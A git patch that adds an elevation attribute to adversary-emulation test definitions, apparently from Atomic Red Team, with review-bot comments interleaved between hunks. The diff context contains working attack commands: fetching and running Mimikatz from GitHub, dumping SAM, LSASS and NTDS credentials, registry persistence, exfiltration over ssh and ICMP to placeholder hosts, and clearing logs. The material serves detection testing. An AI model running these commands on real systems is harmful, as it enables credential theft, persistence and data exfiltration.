From 1bfefdacfc25d9893917736dec076a686c72a57f Mon Sep 17 00:00:00 2001 
From: Carrie Roberts Date: Tue, 3 Sep 2019 07:34:42 -0600 Subject: [PATCH] Add elevated (#542) * provide elevation_required attribute * provide elevation_required attribute * provide elevation_required attribute --- atomics/T1002/T1002.yaml | 5 +++++ atomics/T1003/T1003.yaml | 8 ++++++++ atomics/T1004/T1004.yaml | 3 +++ atomics/T1005/T1005.yaml | 1 + atomics/T1007/T1007.yaml | 2 ++ atomics/T1009/T1009.yaml | 1 + atomics/T1010/T1010.yaml | 1 + atomics/T1012/T1012.yaml | 1 + atomics/T1015/T1015.yaml | 7 +++++++ atomics/T1016/T1016.yaml | 2 ++ atomics/T1018/T1018.yaml | 5 +++++ atomics/T1022/T1022.yaml | 4 ++++ atomics/T1027/T1027.yaml | 1 + atomics/T1028/T1028.yaml | 1 + atomics/T1030/T1030.yaml | 1 + atomics/T1031/T1031.yaml | 1 + atomics/T1033/T1033.yaml | 2 ++ atomics/T1035/T1035.yaml | 1 + atomics/T1036/T1036.yaml | 2 ++ atomics/T1037/T1037.yaml | 1 + atomics/T1040/T1040.yaml | 4 ++++ atomics/T1042/T1042.yaml | 1 + atomics/T1046/T1046.yaml | 1 + atomics/T1047/T1047.yaml | 4 ++++ atomics/T1048/T1048.yaml | 3 +++ atomics/T1049/T1049.yaml | 3 +++ atomics/T1050/T1050.yaml | 2 ++ atomics/T1053/T1053.yaml | 2 ++ atomics/T1055/T1055.yaml | 2 ++ atomics/T1057/T1057.yaml | 1 + atomics/T1063/T1063.yaml | 4 ++++ atomics/T1064/T1064.yaml | 1 + atomics/T1065/T1065.yaml | 2 ++ atomics/T1069/T1069.yaml | 2 ++ atomics/T1070/T1070.yaml | 2 ++ atomics/T1071/T1071.yaml | 4 ++++ atomics/T1074/T1074.yaml | 3 ++- atomics/T1076/T1076.yaml | 1 + atomics/T1077/T1077.yaml | 2 ++ atomics/T1081/T1081.yaml | 2 ++ atomics/T1082/T1082.yaml | 1 + atomics/T1083/T1083.yaml | 2 ++ atomics/T1084/T1084.yaml | 1 + atomics/T1085/T1085.yaml | 1 + atomics/T1086/T1086.yaml | 11 +++++++++++ atomics/T1087/T1087.yaml | 4 ++++ atomics/T1088/T1088.yaml | 2 ++ atomics/T1096/T1096.yaml | 1 + atomics/T1098/T1098.yaml | 1 + atomics/T1099/T1099.yaml | 3 +++ atomics/T1101/T1101.yaml | 1 + atomics/T1103/T1103.yaml | 1 + atomics/T1105/T1105.yaml | 2 ++ atomics/T1107/T1107.yaml | 7 +++++++ atomics/T1110/T1110.yaml | 1 
+ atomics/T1112/T1112.yaml | 3 +++ atomics/T1113/T1113.yaml | 2 ++ atomics/T1114/T1114.yaml | 1 + atomics/T1115/T1115.yaml | 2 ++ atomics/T1117/T1117.yaml | 3 +++ atomics/T1118/T1118.yaml | 2 ++ atomics/T1119/T1119.yaml | 1 + atomics/T1121/T1121.yaml | 2 ++ atomics/T1123/T1123.yaml | 2 ++ atomics/T1124/T1124.yaml | 2 ++ atomics/T1126/T1126.yaml | 3 +++ atomics/T1127/T1127.yaml | 1 + atomics/T1134/T1134.yaml | 1 + atomics/T1135/T1135.yaml | 2 ++ atomics/T1136/T1136.yaml | 2 ++ atomics/T1138/T1138.yaml | 1 + atomics/T1140/T1140.yaml | 2 ++ atomics/T1141/T1141.yaml | 1 + atomics/T1145/T1145.yaml | 1 + atomics/T1158/T1158.yaml | 8 ++++++-- atomics/T1170/T1170.yaml | 1 + atomics/T1174/T1174.yaml | 1 + atomics/T1179/T1179.yaml | 1 + atomics/T1180/T1180.yaml | 1 + atomics/T1183/T1183.yaml | 2 ++ atomics/T1191/T1191.yaml | 2 ++ atomics/T1193/T1193.yaml | 1 + atomics/T1196/T1196.yaml | 1 + atomics/T1201/T1201.yaml | 2 ++ atomics/T1214/T1214.yaml | 1 + atomics/T1216/T1216.yaml | 1 + atomics/T1218/T1218.yaml | 1 + atomics/T1223/T1223.yaml | 2 ++ atomics/T1485/T1485.yaml | 3 +++ atomics/T1489/T1489.yaml | 3 +++ atomics/T1490/T1490.yaml | 4 ++++ 91 files changed, 201 insertions(+), 3 deletions(-) diff --git a/atomics/T1002/T1002.yaml b/atomics/T1002/T1002.yaml index 619f663c3e..522d5dade1 100644 --- a/atomics/T1002/T1002.yaml +++ b/atomics/T1002/T1002.yaml @@ -19,6 +19,7 @@ atomic_tests: default: C:\test\Data.zip executor: name: powershell + elevation_required: false command: | dir #{input_file} -Recurse | Compress-Archive -DestinationPath #{output_file} @@ -38,6 +39,7 @@ atomic_tests: default: exfilthis.rar executor: name: command_prompt + elevation_required: false command: | rar a -r #{output_file} #{input_file} @@ -58,6 +60,7 @@ atomic_tests: default: /tmp/victim-files.zip executor: name: sh + elevation_required: false command: | zip #{output_file} #{input_files} 
@@ -74,6 +77,7 @@ atomic_tests: default: /tmp/victim-gzip.txt executor: name: sh + elevation_required: false command: | gzip -f #{input_file} @@ -94,5 +98,6 @@ atomic_tests: default: /tmp/victim-files.tar.gz executor: name: sh + elevation_required: false command: | tar -cvzf #{output_file} #{input_file_folder} \ No newline at end of file diff --git a/atomics/T1003/T1003.yaml b/atomics/T1003/T1003.yaml index 7ce17c444c..9849d3a390 100644 --- a/atomics/T1003/T1003.yaml +++ b/atomics/T1003/T1003.yaml @@ -15,6 +15,7 @@ atomic_tests: default: https://raw.githubusercontent.com/EmpireProject/Empire/dev/data/module_source/credentials/Invoke-Mimikatz.ps1 executor: name: powershell + elevation_required: true command: | IEX (New-Object Net.WebClient).DownloadString('#{remote_script}'); Invoke-Mimikatz -DumpCreds @@ -25,6 +26,7 @@ atomic_tests: - windows executor: name: command_prompt + elevation_required: true command: | gsecdump -a @@ -40,6 +42,7 @@ atomic_tests: default: output.txt executor: name: command_prompt + elevation_required: true command: | wce -o #{output_file} @@ -51,6 +54,7 @@ atomic_tests: - windows executor: name: command_prompt + elevation_required: true command: | reg save HKLM\sam sam reg save HKLM\system system @@ -68,6 +72,7 @@ atomic_tests: type: Path default: lsass_dump.dmp executor: + elevation_required: true name: command_prompt command: | procdump.exe -accepteula -ma lsass.exe #{output_file} @@ -130,6 +135,7 @@ atomic_tests: default: C:\Atomic_Red_Team executor: name: command_prompt + elevation_required: true command: | ntdsutil “ac i ntds” “ifm” “create full #{output_folder} q q @@ -145,6 +151,7 @@ atomic_tests: default: "C:" executor: name: command_prompt + elevation_required: true command: | vssadmin.exe create shadow /for=#{drive_letter} 
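Review bot: In the T1003 hunk at `@@ -68,6 +72,7`, `elevation_required: true` is inserted before `name: command_prompt`, while every other hunk in this patch places it after the `name:` key. Mapping order is not significant to the YAML parser, so this is a style point rather than a functional one, but a consistent key order within the `executor:` blocks keeps them diffable and easy to scan across the 91 touched files. Suggest moving the line so the block reads `name: command_prompt`, then `elevation_required: true`, then `command: |`.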
@@ -168,6 +175,7 @@ atomic_tests: default: C:\Extract executor: name: command_prompt + elevation_required: true command: | copy #{vsc_name}\Windows\NTDS\NTDS.dit #{extract_path}\ntds.dit copy #{vsc_name}\Windows\System32\config\SYSTEM #{extract_path}\VSC_SYSTEM_HIVE diff --git a/atomics/T1004/T1004.yaml b/atomics/T1004/T1004.yaml index 63e470e12f..ee1cb90c6b 100644 --- a/atomics/T1004/T1004.yaml +++ b/atomics/T1004/T1004.yaml @@ -18,6 +18,7 @@ atomic_tests: executor: name: powershell + elevation_required: false command: | Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Shell" "explorer.exe, #{binary_to_execute}" -Force @@ -36,6 +37,7 @@ atomic_tests: executor: name: powershell + elevation_required: false command: | Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Userinit" "Userinit.exe, #{binary_to_execute}" -Force @@ -54,6 +56,7 @@ atomic_tests: executor: name: powershell + elevation_required: false command: | New-Item "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" -Force Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" "logon" "#{binary_to_execute}" -Force diff --git a/atomics/T1005/T1005.yaml b/atomics/T1005/T1005.yaml index c31e96cd37..2d9e98a9a3 100644 --- a/atomics/T1005/T1005.yaml +++ b/atomics/T1005/T1005.yaml @@ -18,6 +18,7 @@ atomic_tests: executor: name: sh + elevation_required: false command: | cd ~/Library/Cookies grep -q "#{search_string}" "Cookies.binarycookies" diff --git a/atomics/T1007/T1007.yaml b/atomics/T1007/T1007.yaml index 11be2a1bbc..766e042c64 100644 --- a/atomics/T1007/T1007.yaml +++ b/atomics/T1007/T1007.yaml @@ -18,6 +18,7 @@ atomic_tests: executor: name: command_prompt + elevation_required: true command: | tasklist.exe sc query @@ -38,5 +39,6 @@ atomic_tests: default: C:\Windows\Temp\service-list.txt executor: name: command_prompt + elevation_required: false command: | net.exe start >> #{output_file} 
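Review bot: In the T1007 hunk at `@@ -18,6 +18,7`, `elevation_required: true` is set for a command block whose visible lines are `tasklist.exe` and `sc query`, both of which run under a standard user account, while the sibling hunk at `@@ -38,5 +39,6` marks the comparable `net.exe start` test as `false`. The remainder of this command block lies outside the hunk, so if a later line genuinely needs administrator rights the value is correct; otherwise it should be `elevation_required: false` so a runner that honors the attribute does not prompt for elevation unnecessarily. If it is kept as `true`, a comment above the line naming the command that needs elevation would make the intent reviewable.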
diff --git a/atomics/T1009/T1009.yaml b/atomics/T1009/T1009.yaml index ea09cedc7b..135d5b65d7 100644 --- a/atomics/T1009/T1009.yaml +++ b/atomics/T1009/T1009.yaml @@ -17,5 +17,6 @@ atomic_tests: default: /tmp/evil-binary executor: name: sh + elevation_required: false command: | dd if=/dev/zero bs=1 count=1 >> #{file_to_pad} diff --git a/atomics/T1010/T1010.yaml b/atomics/T1010/T1010.yaml index 09c73a6f48..eb188437c0 100644 --- a/atomics/T1010/T1010.yaml +++ b/atomics/T1010/T1010.yaml @@ -22,6 +22,7 @@ atomic_tests: executor: name: command_prompt + elevation_required: false command: | C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe -out:#{output_file_name} #{input_source_code} #{output_file_name} diff --git a/atomics/T1012/T1012.yaml b/atomics/T1012/T1012.yaml index cb6c5519b0..735cee450d 100644 --- a/atomics/T1012/T1012.yaml +++ b/atomics/T1012/T1012.yaml @@ -23,6 +23,7 @@ atomic_tests: executor: name: command_prompt + elevation_required: true command: | reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce diff --git a/atomics/T1015/T1015.yaml b/atomics/T1015/T1015.yaml index e9ef61bb65..b7e9a6b5bd 100644 --- a/atomics/T1015/T1015.yaml +++ b/atomics/T1015/T1015.yaml @@ -17,6 +17,7 @@ atomic_tests: executor: name: command_prompt + elevation_required: true command: | reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f @@ -34,6 +35,7 @@ atomic_tests: executor: name: command_prompt + elevation_required: true command: | reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f 
@@ -51,6 +53,7 @@ atomic_tests: executor: name: command_prompt + elevation_required: true command: | reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f @@ -68,6 +71,7 @@ atomic_tests: executor: name: command_prompt + elevation_required: true command: | reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f @@ -85,6 +89,7 @@ atomic_tests: executor: name: command_prompt + elevation_required: true command: | reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f @@ -102,6 +107,7 @@ atomic_tests: executor: name: command_prompt + elevation_required: true command: | reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f @@ -119,5 +125,6 @@ atomic_tests: executor: name: command_prompt + elevation_required: true command: | reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f diff --git a/atomics/T1016/T1016.yaml b/atomics/T1016/T1016.yaml index ccc023e767..d9b924891d 100644 --- a/atomics/T1016/T1016.yaml +++ b/atomics/T1016/T1016.yaml @@ -12,6 +12,7 @@ atomic_tests: executor: name: command_prompt + elevation_required: false command: | ipconfig /all netsh interface show @@ -29,6 +30,7 @@ atomic_tests: executor: name: sh + elevation_required: false command: | arp -a netstat -ant | awk '{print $NF}' | grep -v '[a-z]' | sort | uniq -c diff --git a/atomics/T1018/T1018.yaml b/atomics/T1018/T1018.yaml index 53b9faba3b..9685af0326 100644 --- a/atomics/T1018/T1018.yaml +++ b/atomics/T1018/T1018.yaml 
@@ -12,6 +12,7 @@ atomic_tests: executor: name: command_prompt + elevation_required: false command: | net view /domain net view @@ -25,6 +26,7 @@ atomic_tests: executor: name: command_prompt + elevation_required: false command: | for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i @@ -37,6 +39,7 @@ atomic_tests: executor: name: command_prompt + elevation_required: false command: | arp -a @@ -50,6 +53,7 @@ atomic_tests: executor: name: sh + elevation_required: false command: | arp -a | grep -v '^?' @@ -63,5 +67,6 @@ atomic_tests: executor: name: sh + elevation_required: false command: | for ip in $(seq 1 254); do ping -c 1 192.168.1.$ip -o; [ $? -eq 0 ] && echo "192.168.1.$ip UP" || : ; done diff --git a/atomics/T1022/T1022.yaml b/atomics/T1022/T1022.yaml index cb4a1673ea..e6599bfdfe 100644 --- a/atomics/T1022/T1022.yaml +++ b/atomics/T1022/T1022.yaml @@ -14,6 +14,7 @@ atomic_tests: executor: name: sh + elevation_required: false command: | echo "This file will be encrypted" > /tmp/victim-gpg.txt mkdir /tmp/victim-files @@ -32,6 +33,7 @@ atomic_tests: - windows executor: name: command_prompt + elevation_required: false command: | mkdir ./tmp/victim-files cd ./tmp/victim-files @@ -47,6 +49,7 @@ atomic_tests: - windows executor: name: command_prompt + elevation_required: false command: | path=%path%;"C:\Program Files (x86)\winzip" mkdir ./tmp/victim-files @@ -62,6 +65,7 @@ atomic_tests: - windows executor: name: command_prompt + elevation_required: false command: | mkdir ./tmp/victim-files cd ./tmp/victim-files diff --git a/atomics/T1027/T1027.yaml b/atomics/T1027/T1027.yaml index 13087ab7f1..6ac7632de2 100644 --- a/atomics/T1027/T1027.yaml +++ b/atomics/T1027/T1027.yaml @@ -13,6 +13,7 @@ atomic_tests: executor: name: sh + elevation_required: false command: | sh -c "echo ZWNobyBIZWxsbyBmcm9tIHRoZSBBdG9taWMgUmVkIFRlYW0= > /tmp/encoded.dat" cat /tmp/encoded.dat | base64 -d > /tmp/art.sh 
diff --git a/atomics/T1028/T1028.yaml b/atomics/T1028/T1028.yaml index 30680d106f..39ce3e5e90 100644 --- a/atomics/T1028/T1028.yaml +++ b/atomics/T1028/T1028.yaml @@ -12,6 +12,7 @@ atomic_tests: executor: name: powershell + elevation_required: true command: | Enable-PSRemoting -Force diff --git a/atomics/T1030/T1030.yaml b/atomics/T1030/T1030.yaml index 92ddfb6fd1..b5e6cea690 100644 --- a/atomics/T1030/T1030.yaml +++ b/atomics/T1030/T1030.yaml @@ -15,6 +15,7 @@ atomic_tests: executor: name: sh + elevation_required: false command: | cd /tmp/ dd if=/dev/urandom of=/tmp/victim-whole-file bs=25M count=1 diff --git a/atomics/T1031/T1031.yaml b/atomics/T1031/T1031.yaml index c2b61952a1..1b647c6e72 100644 --- a/atomics/T1031/T1031.yaml +++ b/atomics/T1031/T1031.yaml @@ -13,6 +13,7 @@ atomic_tests: executor: name: command_prompt + elevation_required: true command: | sc config Fax binPath= "C:\windows\system32\WindowsPowerShell\v1.0\powershell.exe -noexit -c \"write-host 'T1031 Test'\"" sc start Fax diff --git a/atomics/T1033/T1033.yaml b/atomics/T1033/T1033.yaml index ce16f6bf4e..c6a6952a2d 100644 --- a/atomics/T1033/T1033.yaml +++ b/atomics/T1033/T1033.yaml @@ -18,6 +18,7 @@ atomic_tests: executor: name: command_prompt + elevation_required: false command: | cmd.exe /C whoami wmic useraccount get /ALL @@ -38,6 +39,7 @@ atomic_tests: executor: name: sh + elevation_required: false command: | users w diff --git a/atomics/T1035/T1035.yaml b/atomics/T1035/T1035.yaml index 301af3422a..e42c32fa5a 100644 --- a/atomics/T1035/T1035.yaml +++ b/atomics/T1035/T1035.yaml @@ -23,6 +23,7 @@ atomic_tests: executor: name: command_prompt + elevation_required: true command: | sc.exe create #{service_name} binPath= #{executable_command} sc.exe start #{service_name} diff --git a/atomics/T1036/T1036.yaml b/atomics/T1036/T1036.yaml index 218a4461ad..54e0871845 100644 --- a/atomics/T1036/T1036.yaml +++ b/atomics/T1036/T1036.yaml 
@@ -12,6 +12,7 @@ atomic_tests: executor: name: command_prompt + elevation_required: false command: | cmd.exe /c copy %SystemRoot%\System32\cmd.exe %SystemRoot%\Temp\lsass.exe cmd.exe /c %SystemRoot%\Temp\lsass.exe @@ -25,6 +26,7 @@ atomic_tests: executor: name: sh + elevation_required: false command: | cp /bin/sh /tmp/crond /tmp/crond diff --git a/atomics/T1037/T1037.yaml b/atomics/T1037/T1037.yaml index 44d5c774f2..b233ba774e 100644 --- a/atomics/T1037/T1037.yaml +++ b/atomics/T1037/T1037.yaml @@ -18,6 +18,7 @@ atomic_tests: executor: name: command_prompt + elevation_required: false command: | REG.exe ADD HKCU\Environment /v UserInitMprLogonScript /t REG_MULTI_SZ /d "#{script_command}" diff --git a/atomics/T1040/T1040.yaml b/atomics/T1040/T1040.yaml index a201c210fc..a08b1d63b4 100644 --- a/atomics/T1040/T1040.yaml +++ b/atomics/T1040/T1040.yaml @@ -15,6 +15,7 @@ atomic_tests: default: ens33 executor: name: bash + elevation_required: true command: | tcpdump -c 5 -nnni #{interface} tshark -c 5 -i #{interface} @@ -31,6 +32,7 @@ atomic_tests: default: en0A executor: name: bash + elevation_required: true command: | tcpdump -c 5 -nnni #{interface} tshark -c 5 -i #{interface} @@ -48,6 +50,7 @@ atomic_tests: default: Ethernet0 executor: name: command_prompt + elevation_required: true command: | c:\Program Files\Wireshark\tshark.exe -i #{interface} -c 5 c:\windump.exe @@ -65,6 +68,7 @@ atomic_tests: default: Ethernet0 executor: name: powershell + elevation_required: true command: | c:\Program Files\Wireshark\tshark.exe -i #{interface} -c 5 c:\windump.exe diff --git a/atomics/T1042/T1042.yaml b/atomics/T1042/T1042.yaml index 2330f9d9f9..def59b5f01 100644 --- a/atomics/T1042/T1042.yaml +++ b/atomics/T1042/T1042.yaml @@ -20,5 +20,6 @@ atomic_tests: default: C:\Program Files\Windows Media Player\wmplayer.exe executor: name: command_prompt + elevation_required: false command: | cmd.exe /c assoc #{extension_to_change}="#{target_exenstion_handler}" 
diff --git a/atomics/T1046/T1046.yaml b/atomics/T1046/T1046.yaml index edae7b327e..38ec1a0abe 100644 --- a/atomics/T1046/T1046.yaml +++ b/atomics/T1046/T1046.yaml @@ -11,6 +11,7 @@ atomic_tests: - macos executor: name: sh + elevation_required: false command: | for port in {1..65535}; do diff --git a/atomics/T1047/T1047.yaml b/atomics/T1047/T1047.yaml index 067092d37b..2168a481ae 100644 --- a/atomics/T1047/T1047.yaml +++ b/atomics/T1047/T1047.yaml @@ -10,6 +10,7 @@ atomic_tests: - windows executor: name: command_prompt + elevation_required: false command: | wmic useraccount get /ALL - name: WMI Reconnaissance Processes @@ -19,6 +20,7 @@ atomic_tests: - windows executor: name: command_prompt + elevation_required: false command: | wmic process get caption,executablepath,commandline - name: WMI Reconnaissance Software @@ -28,6 +30,7 @@ atomic_tests: - windows executor: name: command_prompt + elevation_required: false command: | wmic qfe get description,installedOn /format:csv - name: WMI Reconnaissance List Remote Services @@ -47,6 +50,7 @@ atomic_tests: default: sql server executor: name: command_prompt + elevation_required: false command: | wmic /node:"#{node}" service where (caption like "%#{service_search_string} (%") diff --git a/atomics/T1048/T1048.yaml b/atomics/T1048/T1048.yaml index cecbbb9038..ca0e8c2c55 100644 --- a/atomics/T1048/T1048.yaml +++ b/atomics/T1048/T1048.yaml @@ -31,6 +31,7 @@ atomic_tests: executor: name: sh + elevation_required: false command: | ssh #{domain} "(cd /etc && tar -zcvf - *)" > ./etc.tar.gz @@ -62,6 +63,7 @@ atomic_tests: executor: name: sh + elevation_required: false command: | tar czpf - /Users/* | openssl des3 -salt -pass #{password} | ssh #{user_name}@#{domain} 'cat > /Users.tar.gz.enc' 
@@ -111,5 +113,6 @@ atomic_tests: executor: name: powershell + elevation_required: false command: | $ping = New-Object System.Net.Networkinformation.ping; foreach($Data in Get-Content -Path #{input_file} -Encoding Byte -ReadCount 1024) { $ping.Send("#{ip_address}", 1500, $Data) } diff --git a/atomics/T1049/T1049.yaml b/atomics/T1049/T1049.yaml index e57adc8046..c9eb674918 100644 --- a/atomics/T1049/T1049.yaml +++ b/atomics/T1049/T1049.yaml @@ -12,6 +12,7 @@ atomic_tests: executor: name: command_prompt + elevation_required: false command: | netstat net use @@ -26,6 +27,7 @@ atomic_tests: executor: name: powershell + elevation_required: false command: | Get-NetTCPConnection @@ -39,6 +41,7 @@ atomic_tests: executor: name: sh + elevation_required: false command: | netstat who -a diff --git a/atomics/T1050/T1050.yaml b/atomics/T1050/T1050.yaml index bd6dde4693..e5e5349436 100644 --- a/atomics/T1050/T1050.yaml +++ b/atomics/T1050/T1050.yaml @@ -20,6 +20,7 @@ atomic_tests: default: AtomicTestService executor: name: command_prompt + elevation_required: true command: | sc.exe create #{service_name} binPath= #{binary_path} sc.exe start #{service_name} @@ -44,6 +45,7 @@ atomic_tests: default: AtomicTestService executor: name: powershell + elevation_required: true command: | New-Service -Name "#{service_name}" -BinaryPathName "#{binary_path}" Start-Service -Name "#{service_name}" diff --git a/atomics/T1053/T1053.yaml b/atomics/T1053/T1053.yaml index e81a4c38b3..d29ec7172f 100644 --- a/atomics/T1053/T1053.yaml +++ b/atomics/T1053/T1053.yaml @@ -13,6 +13,7 @@ atomic_tests: executor: name: command_prompt + elevation_required: false command: | at 13:20 /interactive cmd - name: Scheduled task Local @@ -33,6 +34,7 @@ atomic_tests: executor: name: command_prompt + elevation_required: false command: | SCHTASKS /Create /SC ONCE /TN spawn /TR #{task_command} /ST #{time} diff --git a/atomics/T1055/T1055.yaml b/atomics/T1055/T1055.yaml index c7267e4300..6a7878ae88 100644 
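Review bot: In the T1053 hunk at `@@ -13,6 +13,7`, `elevation_required: false` is set for the test whose command is `at 13:20 /interactive cmd`; as far as I know `at.exe` requires membership in the local Administrators group and returns access denied otherwise, so a runner honoring this attribute would execute the test in a context where it cannot succeed. The `SCHTASKS /Create` test in the following hunk at `@@ -33,6 +34,7` creates a local task and is correctly marked `false`. Suggest `elevation_required: true` for the `at` test, or a comment explaining why it was deliberately left as `false`.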
--- a/atomics/T1055/T1055.yaml +++ b/atomics/T1055/T1055.yaml @@ -21,6 +21,7 @@ atomic_tests: default: $pid executor: name: powershell + elevation_required: true command: | mavinject $pid /INJECTRUNNING #{dll_payload} @@ -42,6 +43,7 @@ atomic_tests: default: $pid executor: name: powershell + elevation_required: true command: | Invoke-DllInjection.ps1 -ProcessID #{process_id} -Dll #{dll_payload} diff --git a/atomics/T1057/T1057.yaml b/atomics/T1057/T1057.yaml index df52668394..5c25ead5fc 100644 --- a/atomics/T1057/T1057.yaml +++ b/atomics/T1057/T1057.yaml @@ -21,6 +21,7 @@ atomic_tests: executor: name: sh + elevation_required: false command: | ps >> #{output_file} ps aux >> #{output_file} diff --git a/atomics/T1063/T1063.yaml b/atomics/T1063/T1063.yaml index e68763dfb9..28bde8e581 100644 --- a/atomics/T1063/T1063.yaml +++ b/atomics/T1063/T1063.yaml @@ -12,6 +12,7 @@ atomic_tests: executor: name: command_prompt + elevation_required: false command: | netsh.exe advfirewall firewall show all profiles tasklist.exe @@ -29,6 +30,7 @@ atomic_tests: executor: name: powershell + elevation_required: false command: | get-process | ?{$_.Description -like "*virus*"} get-process | ?{$_.Description -like "*carbonblack*"} @@ -45,6 +47,7 @@ atomic_tests: executor: name: sh + elevation_required: false command: | ps -ef | grep Little\ Snitch | grep -v grep ps aux | grep CbOsxSensorService @@ -58,5 +61,6 @@ atomic_tests: executor: name: command_prompt + elevation_required: true command: | fltmc.exe | findstr.exe 385201 \ No newline at end of file diff --git a/atomics/T1064/T1064.yaml b/atomics/T1064/T1064.yaml index 403c69ff09..739ee3e3e1 100644 --- a/atomics/T1064/T1064.yaml +++ b/atomics/T1064/T1064.yaml @@ -13,6 +13,7 @@ atomic_tests: executor: name: sh + elevation_required: false command: | sh -c "echo 'echo Hello from the Atomic Red Team' > /tmp/art.sh" sh -c "echo 'ping -c 4 8.8.8.8' >> /tmp/art.sh" 
diff --git a/atomics/T1065/T1065.yaml b/atomics/T1065/T1065.yaml index 41bc197411..8d5d0d9f0c 100644 --- a/atomics/T1065/T1065.yaml +++ b/atomics/T1065/T1065.yaml @@ -22,6 +22,7 @@ atomic_tests: executor: name: powershell + elevation_required: false command: | test-netconnection -ComputerName #{domain} -port #{port} @@ -45,5 +46,6 @@ atomic_tests: executor: name: sh + elevation_required: false command: | telnet #{domain} #{port} diff --git a/atomics/T1069/T1069.yaml b/atomics/T1069/T1069.yaml index 3d45d14a97..1a862a2329 100644 --- a/atomics/T1069/T1069.yaml +++ b/atomics/T1069/T1069.yaml @@ -27,6 +27,7 @@ atomic_tests: executor: name: command_prompt + elevation_required: false command: | net localgroup net group /domain @@ -46,6 +47,7 @@ atomic_tests: executor: name: powershell + elevation_required: false command: | get-localgroup get-ADPrinicipalGroupMembership #{user} | select name diff --git a/atomics/T1070/T1070.yaml b/atomics/T1070/T1070.yaml index 3affd9e123..12d6de8223 100644 --- a/atomics/T1070/T1070.yaml +++ b/atomics/T1070/T1070.yaml @@ -15,6 +15,7 @@ atomic_tests: default: System executor: name: command_prompt + elevation_required: true command: | wevtutil cl #{log_name} @@ -25,6 +26,7 @@ atomic_tests: - windows executor: name: command_prompt + elevation_required: true command: | fsutil usn deletejournal /D C: diff --git a/atomics/T1071/T1071.yaml b/atomics/T1071/T1071.yaml index 3c35317d5e..fa3ed6e5f7 100644 --- a/atomics/T1071/T1071.yaml +++ b/atomics/T1071/T1071.yaml @@ -17,6 +17,7 @@ atomic_tests: default: www.google.com executor: name: powershell + elevation_required: false command: | Invoke-WebRequest #{domain} -UserAgent "HttpBrowser/1.0" | out-null Invoke-WebRequest #{domain} -UserAgent "Wget/1.9+cvs-stable (Red Hat modified)" | out-null 
@@ -70,6 +71,7 @@ atomic_tests: default: 1000 executor: name: powershell + elevation_required: false command: | for($i=0; $i -le $#{query_volume}; $i++) { Resolve-DnsName -type "#{query_type}" "#{subdomain}.$(Get-Random -Minimum 1 -Maximum 999999).#{domain}" -QuickTimeout} @@ -107,6 +109,7 @@ atomic_tests: default: 30 executor: name: powershell + elevation_required: false command: | .\T1071-dns-beacon.ps1 -Domain #{domain} -Subdomain #{subdomain} -QueryType #{query_type} -C2Interval #{c2_interval} -C2Jitter #{c2_jitter} -RunTime #{runtime} @@ -132,5 +135,6 @@ atomic_tests: default: TXT executor: name: powershell + elevation_required: false command: | .\T1071-dns-domain-length.ps1 -Domain #{domain} -Subdomain #{subdomain} -QueryType #{query_type} \ No newline at end of file diff --git a/atomics/T1074/T1074.yaml b/atomics/T1074/T1074.yaml index 86173a5089..23c477922d 100644 --- a/atomics/T1074/T1074.yaml +++ b/atomics/T1074/T1074.yaml @@ -12,8 +12,9 @@ atomic_tests: executor: name: powershell + elevation_required: false command: | - "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat')" > c:\windows\pi.log + IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat') > pi.log - name: Stage data from Discovery.sh description: | diff --git a/atomics/T1076/T1076.yaml b/atomics/T1076/T1076.yaml index 92c460b716..365c0a9761 100644 --- a/atomics/T1076/T1076.yaml +++ b/atomics/T1076/T1076.yaml @@ -13,6 +13,7 @@ atomic_tests: executor: name: command_prompt + elevation_required: true command: | query user sc.exe create sesshijack binpath= "cmd.exe /k tscon 1337 /dest:rdp-tcp#55" diff --git a/atomics/T1077/T1077.yaml b/atomics/T1077/T1077.yaml index 1fcac5742c..d0aa110e2d 100644 --- a/atomics/T1077/T1077.yaml +++ b/atomics/T1077/T1077.yaml 
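Review bot: The T1074 hunk at `@@ -12,8 +12,9` changes the test command itself (the surrounding double quotes are dropped, so the downloaded content is now actually invoked rather than echoed, and the redirect target moves from `c:\windows\pi.log` to `pi.log`), which goes beyond the `elevation_required` attribute the commit title and message describe; the description should mention this behavior change so it is not missed in review or changelog generation. The new relative path `pi.log` also means the artifact lands in whatever working directory the executor happens to use, so if the test's description (outside the hunk) does not already say where the file is written and how to clean it up, a sentence to that effect would help. The `elevation_required: false` value itself is consistent with no longer writing under `c:\windows`.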
